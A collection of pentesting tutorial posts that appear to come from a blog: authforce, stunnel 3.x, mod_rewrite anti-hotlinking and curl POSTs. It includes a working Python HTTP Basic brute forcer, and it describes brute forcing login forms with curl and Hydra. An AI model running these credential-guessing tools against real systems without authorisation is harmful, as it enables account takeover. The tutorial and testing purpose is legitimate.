Brute force HTTP Basic authentication with authforce 
Authforce is a very fast tool for brute forcing HTTP Basic Authentication protected URLs. In HTTP Basic authentication the client joins the username and password as username:password, Base64-encodes the result and sends it in the Authorization header of every request. Base64 is an encoding, not encryption, so unless the connection is wrapped in SSL/TLS the credentials cross the network in what is effectively plaintext and are vulnerable to eavesdropping. Despite this weakness it is still quite widely used - for example, access to the Tomcat manager application is protected by HTTP Basic by default.

When a client requests a HTTP Basic-protected resource without credentials, the web server challenges with a 401 status (the RFC reason phrase is "Unauthorized"; Apache's error page says "Authorization Required") carrying a WWW-Authenticate: Basic header, and it is that header which makes the username/password dialog pop up in your browser. (See www.w3.org's page for a listing of all HTTP status codes.) The URL that produces that challenge is the target for authforce to run against.

Authforce needs a list of usernames, a list of passwords and a target URL. Here's an example:

authforce --verbose --beep --logfile=aftest --username-file=users --password-file=words http://192.168.1.100/tmp

authforce shows you the username and password currently being tried in real time. If it gets a match you will see something like this:

match [goonda:mysecretpass]

Note that authforce works against both http and https URLs; however, you will need to add the --no-ssl-fail option if the site uses a self-signed certificate. Also bear in mind that a brute force like this is noisy: every failed attempt shows up as a 401 in the target's access log, so don't expect it to go unnoticed on a monitored box. Happy Hacking!
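To make the exchange concrete, here is an added example (my own code, not part of authforce or of the original post) that does in Python what authforce does: it first probes the URL to confirm it really answers with a 401 plus WWW-Authenticate: Basic, then walks a username list and a password list, Base64-encoding each pair into an Authorization header and stopping at the first response that is not a 401. So that it runs offline, the block also starts a constructed Basic-protected server on a loopback port; the accepted credentials, the realm name and the wordlists are all made up for the demo.

```python
"""Brute force HTTP Basic authentication the way authforce does, against a local test server."""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed for this example: the one credential the test server accepts.
VALID_USER, VALID_PASS = "goonda", "mysecretpass"

# Opener with proxies disabled so an http_proxy in the environment cannot hijack the loopback test.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def encode_basic(user, password):
    """Build the Authorization header value: 'Basic ' + base64(user:password).
    Base64 is reversible, which is why Basic over plain HTTP is 'plaintext' to a sniffer."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def decode_basic(header_value):
    """Recover (user, password) from an Authorization: Basic header, as an eavesdropper would."""
    raw = base64.b64decode(header_value.split(" ", 1)[1]).decode()
    user, _, password = raw.partition(":")  # only the first ':' separates; passwords may contain ':'
    return user, password


class BasicProtectedHandler(BaseHTTPRequestHandler):
    """Minimal stand-in for a Basic-protected resource (constructed, not any real server product)."""

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        if auth.startswith("Basic ") and decode_basic(auth) == (VALID_USER, VALID_PASS):
            self.send_response(200)
            self.send_header("Content-Length", "8")
            self.end_headers()
            self.wfile.write(b"welcome\n")
            return
        # The challenge: 401 plus WWW-Authenticate is what makes the browser pop its dialog.
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="Test Realm"')  # hypothetical realm name
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def probe(url):
    """Confirm the URL really challenges with Basic and return the WWW-Authenticate value.
    Without this check a wrong URL (404 for everything) would make the very first pair a 'match'."""
    try:
        with OPENER.open(url):
            pass
    except urllib.error.HTTPError as err:
        if err.code == 401 and err.headers.get("WWW-Authenticate", "").startswith("Basic"):
            return err.headers["WWW-Authenticate"]
        raise RuntimeError(f"{url} answered {err.code}, not a Basic challenge")
    raise RuntimeError(f"{url} is not protected at all")


def brute_force(url, users, passwords):
    """Try every pair; the first response that is not 401 is the match. Returns (user, pass) or None."""
    for user in users:
        for password in passwords:
            req = urllib.request.Request(url, headers={"Authorization": encode_basic(user, password)})
            try:
                with OPENER.open(req):
                    return user, password            # 2xx/3xx: credentials accepted
            except urllib.error.HTTPError as err:
                if err.code != 401:
                    return user, password            # e.g. 403: authenticated but not authorised
    return None


def demo():
    """Run the constructed server on an ephemeral loopback port and attack it with tiny wordlists."""
    srv = HTTPServer(("127.0.0.1", 0), BasicProtectedHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/tmp"
        probe(url)
        users = ["admin", "tomcat", "goonda"]             # constructed wordlists
        words = ["password", "tomcat", "mysecretpass"]
        return brute_force(url, users, words)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("match", demo())
```

decode_basic is the same operation a sniffer performs on captured traffic, which is the whole point about Basic over plain HTTP. Against a real target replace demo() with the URL from the 401 challenge and your own wordlists; the probe step is the check worth keeping.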

Setup an SSL tunnel with stunnel 3.x 
Stunnel is a very handy utility for wrapping virtually any service in SSL. From a pentesting perspective it's especially handy if you want to use a tool which only speaks HTTP (e.g. a perl LWP script which you are too lazy to make speak SSL, or you want to make manual HTTP requests ad hoc ;). We can set up a tunnel to our target SSL webserver and have it bind to a local port we can use for access. NOTE: This only applies to stunnel version 3.x; 4.x uses an stunnel.conf file instead of command line switches.

For example, if our target webserver is called example.foo.com, with a webserver running SSL on port 443, we would run the following command to bind to a local high port, e.g. 10666 (-d gives the local listen address, -c selects client mode, -r the remote SSL service). If you attempted to bind to a local port below 1024, you would have to run this command as root:

stunnel -d localhost:10666 -c -r example.foo.com:443

To confirm that it's working, first check the log (usually /var/log/messages, but /var/log/daemon.log on my system).

Mar 7 20:20:32 localhost stunnel[22933]: Using 'example.foo.com.10666' as tcpwrapper service name
Mar 7 20:20:32 localhost stunnel[22933]: stunnel 3.26 on i486-pc-linux-gnu PTHREAD+LIBWRAP with OpenSSL 0.9.8c 05 Sep 2006
Mar 7 20:20:32 localhost stunnel[22934]: FD_SETSIZE=1024, file ulimit=1024 -> 500 clients allowed

So now our stunnel daemon process is listening on localhost, port 10666, ready to service our requests! Let's try it out by doing a simple HEAD request on the target webserver (HTTP/1.0 needs no Host header, but add one if the target serves several name-based virtual hosts and you want a specific one):

user@host# nc localhost 10666
HEAD / HTTP/1.0

HTTP/1.1 403 Forbidden
Date: Sat, 08 Mar 2008 01:12:44 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1

Excellent! I have also run password crackers like hydra through stunnel without problems, so it can take a beating. Two things to keep in mind: the plaintext side is only as private as the localhost bind (anything else running on the box can connect to port 10666 too), and stunnel 3.x in client mode does not verify the server certificate unless you turn verification on with -v, which is fine for poking at a pentest target but not for traffic you actually care about. Happy Hacking!
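For anyone who wants to see what stunnel is doing under the hood, here is an added example (my own code, not stunnel's and not from the original post) of the same plaintext-to-SSL relay in Python: it listens on a local port, opens a TLS connection to the remote for every accepted client, and pumps bytes both ways until one side closes. tls_connect is what a real run would use; the demo() function swaps in a plain TCP connect and a constructed one-shot server that answers with a canned 403, so it runs offline with no certificate involved. The hostname example.foo.com and the canned reply are taken from the text above; everything else is made up for the demo.

```python
"""A plaintext-to-TLS forwarder in the spirit of `stunnel -d localhost:10666 -c -r host:443`."""
import socket
import ssl
import threading


def tls_connect(host, port, verify=True):
    """Open the TLS side of the tunnel. verify=False behaves like stunnel 3.x's default of not
    checking the server certificate: acceptable against a pentest box with a self-signed cert,
    never for traffic you trust."""
    ctx = ssl.create_default_context()
    if not verify:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx.wrap_socket(socket.create_connection((host, port)), server_hostname=host)


def _close_pair(a, b):
    """Tear down both ends; shutdown() also wakes a thread blocked in recv() on the other socket."""
    for s in (a, b):
        try:
            s.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass
        s.close()


def pump(src, dst):
    """Copy bytes src -> dst until src hits EOF or errors, then close both ends of the relay."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:  # ssl.SSLError is an OSError too
        pass
    finally:
        _close_pair(src, dst)


class Tunnel:
    """Listen on a local plaintext port; each accepted connection gets its own upstream
    connection (TLS by default) and is relayed in both directions."""

    def __init__(self, remote_host, remote_port, connect=tls_connect, listen=("127.0.0.1", 0)):
        self.remote = (remote_host, remote_port)
        self.connect = connect
        self.listener = socket.socket()
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind(listen)            # bind to loopback only, like -d localhost:10666
        self.listener.listen(16)
        self.port = self.listener.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:                    # listener closed
                return
            threading.Thread(target=self._relay, args=(client,), daemon=True).start()

    def _relay(self, client):
        try:
            upstream = self.connect(*self.remote)
        except OSError:
            client.close()
            return
        threading.Thread(target=pump, args=(upstream, client), daemon=True).start()
        pump(client, upstream)

    def close(self):
        self.listener.close()


def _one_shot_server(reply):
    """Constructed plain-TCP stand-in for the remote HTTPS server so the demo runs offline:
    reads one request, sends a canned reply and closes, HTTP/1.0 style."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.recv(65536)
        conn.sendall(reply)
        conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def demo():
    """Send the HEAD request from the text through the tunnel and return the raw reply bytes."""
    canned = b"HTTP/1.1 403 Forbidden\r\nServer: Apache\r\nConnection: close\r\n\r\n"
    backend = _one_shot_server(canned)
    # Plain connect instead of tls_connect because the stand-in server speaks no TLS.
    tun = Tunnel("127.0.0.1", backend.getsockname()[1],
                 connect=lambda h, p: socket.create_connection((h, p)))
    try:
        with socket.create_connection(("127.0.0.1", tun.port)) as c:
            c.sendall(b"HEAD / HTTP/1.0\r\nHost: example.foo.com\r\n\r\n")
            chunks = []
            while True:
                chunk = c.recv(65536)
                if not chunk:
                    break
                chunks.append(chunk)
        return b"".join(chunks)
    finally:
        tun.close()
        backend.close()


if __name__ == "__main__":
    print(demo().decode())
```

Against a real target you would construct Tunnel("example.foo.com", 443, listen=("127.0.0.1", 10666)) and point nc, curl or hydra at localhost:10666 exactly as with stunnel; pass connect=lambda h, p: tls_connect(h, p, verify=False) only when the box has a self-signed certificate.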

How to prevent image hotlinking with mod_rewrite 
mod_rewrite is a powerful Apache module for rewriting URLs on the fly. However, if your regex kung-fu is not up to par, it can be a frustrating, hair-pulling exercise to figure out why your rewrite rules are not working. The solution is to add a couple of logging lines into your httpd.conf or vhost stanza:

RewriteEngine On
# Apache 2.2 directives; level 9 records every condition and rule evaluation
RewriteLog "/var/log/apache/rewrite_log"
RewriteLogLevel 9
RewriteCond etc.

Once you've debugged your problem, it's advisable to take these lines out as they can generate A LOT of logs. Another thing I noticed is that these RewriteLog directives only seem to work when placed in the main httpd.conf, not in .htaccess files, despite "AllowOverride All". That is by design: RewriteLog and RewriteLogLevel are only valid in server config and virtual host context. (If you are on Apache 2.4, both directives are gone; the equivalent is LogLevel alert rewrite:trace8 in the main config, with the trace going to the ErrorLog.)

I was trying to prevent hotlinking on this site, that is, someone linking directly to my images rather than to the page in which they are displayed. Essentially this amounts to bandwidth theft. To prevent this, I implemented the following mod_rewrite rules in .htaccess:

RewriteEngine on
# Only apply to the static file types we serve ourselves
RewriteCond %{REQUEST_FILENAME} \.(gif|jpg|js|css)$ [NC]
# Allow a blank Referer (direct visits, privacy plugins, command-line tools)
RewriteCond %{HTTP_REFERER} !^$
# Allow our own site; the dot is escaped (an unescaped goonda.org also matches goondaXorg)
# and https is accepted alongside http
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?goonda\.org/ [NC]
# Anything else gets 403 Forbidden
RewriteRule \.(gif|jpg|js|css)$ - [F]

These rules mean that any request for one of those file types carrying a non-blank Referer which does not originate from my website (goonda.org) receives a 403 (Forbidden). Works great! Bear in mind that the Referer is supplied by the client, so this stops browsers following someone else's <img> tag, not anyone who sets the header deliberately; the blank-Referer exemption is what keeps direct visits and privacy-conscious browsers working.
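Because the three RewriteConds are ANDed and two of them are negated, it is easy to misread which requests get the 403. The following is an added example (my own code, not Apache's and not from the original post) that re-expresses the rule set in Python, with the hostname dot escaped and https accepted, so you can check a path and Referer pair and see the status the rules would produce. The sample requests are constructed; the unescaped pattern is kept only to show what the original regex let through.

```python
"""The anti-hotlink rules, re-expressed in Python so you can check what they allow and block."""
import re

# Same patterns as the .htaccess. The dot in the hostname is escaped: as written with a bare
# goonda.org the host goondaXorg would also have been treated as our own site.
PROTECTED = re.compile(r"\.(gif|jpg|js|css)$", re.IGNORECASE)
OWN_SITE = re.compile(r"^https?://(www\.)?goonda\.org/", re.IGNORECASE)
OWN_SITE_UNESCAPED = re.compile(r"^http://(www\.)?goonda.org/.*$", re.IGNORECASE)  # the original


def is_blocked(path, referer, own_site=OWN_SITE):
    """True when all three RewriteConds hold and the [F] rule fires:
    protected extension, non-blank Referer, Referer not matching our own site."""
    if not PROTECTED.search(path):
        return False                       # RewriteCond %{REQUEST_FILENAME} \.(gif|jpg|js|css)$ fails
    if referer == "":
        return False                       # RewriteCond %{HTTP_REFERER} !^$ fails: blank is allowed
    return not own_site.match(referer)     # RewriteCond %{HTTP_REFERER} !^https?://(www\.)?goonda\.org/


def status_for(path, referer, own_site=OWN_SITE):
    """HTTP status the rule set yields: 403 from the [F] flag, otherwise the file is served."""
    return 403 if is_blocked(path, referer, own_site) else 200


if __name__ == "__main__":
    # Constructed sample requests: (path, value of the Referer header)
    samples = [
        ("/images/logo.jpg", "http://www.goonda.org/index.php"),  # my own page: served
        ("/images/logo.jpg", "https://goonda.org/post/1"),        # own site over https: served
        ("/images/logo.jpg", ""),                                 # no Referer (direct, curl): served
        ("/images/logo.jpg", "http://forum.example/thread/42"),   # someone else's page: 403
        ("/index.html", "http://forum.example/thread/42"),        # not a protected type: served
        ("/images/logo.jpg", "http://goondaXorg/"),               # 403 only with the escaped dot
    ]
    for path, ref in samples:
        print(f"{status_for(path, ref)}  {path}  Referer={ref!r}")
```

The last sample is the one to watch: with the original unescaped pattern it is served, which is a small hole but the kind of thing RewriteLog at level 9 makes obvious.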

cURL tip: How to do a simple HTTP POST 
cURL is a very useful utility for performing HTTP/HTTPS operations from the command line. Many times during a web application pentest you need to send an HTTP POST to a login form (e.g. to brute force a login to the site). Here's the very simple way to do it, assuming the form parameters are called username and password.

curl -d "username=SOMEUSER&password=SOMEPASS" -k https://some.website.com/loginform.jsp

The -d flag makes curl send the string as the POST body (with Content-Type: application/x-www-form-urlencoded) exactly as typed, so a password containing & or = must be percent-encoded by hand or passed with --data-urlencode instead, otherwise the server will split it into extra fields; -k tells curl to ignore SSL certificate errors from the remote site.

Using curl is really only good for quick spot checks; for large-scale brute forcing I'd recommend THC Hydra, the super useful perl module libwww-perl aka LWP, or Nessus, which has incorporated Hydra. On Windows, Brutus works.
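The encoding point above bites exactly when you are brute forcing, because wordlists are full of passwords with & and = in them. Here is an added example (my own code, not curl's and not from the original post) showing the body curl -d sends for such a password next to a properly encoded one, how a form parser splits each of them, and the Python equivalent of the curl line for when a script is easier than a shell loop. The username, password and URL are made up for the demo; post_login is not exercised offline here.

```python
"""What a login-form POST carries, and why `curl -d` needs --data-urlencode for awkward passwords."""
import ssl
import urllib.request
from urllib.parse import parse_qs, urlencode


def raw_body(username, password):
    """The body `curl -d "username=U&password=P"` sends: the string verbatim, nothing encoded."""
    return f"username={username}&password={password}"


def encoded_body(username, password):
    """The body a correct client sends: each value percent-encoded (what --data-urlencode does)."""
    return urlencode({"username": username, "password": password})


def server_sees(body):
    """How a typical form parser splits an application/x-www-form-urlencoded body into fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def post_login(url, username, password, insecure=False):
    """Python equivalent of the curl line: POST the encoded form and return (status, body).
    insecure=True mirrors curl -k (no certificate checking); url is whatever target you are testing."""
    ctx = ssl.create_default_context()
    if insecure:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, data=encoded_body(username, password).encode(),
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, context=ctx) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    # Constructed credentials: a password containing both '&' and '='
    for body in (raw_body("bob", "p&ss=w0rd"), encoded_body("bob", "p&ss=w0rd")):
        print(body, "->", server_sees(body))
```

With the raw body the server sees password=p plus a stray ss=w0rd field, so the correct password is never actually tried; the encoded body arrives intact.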
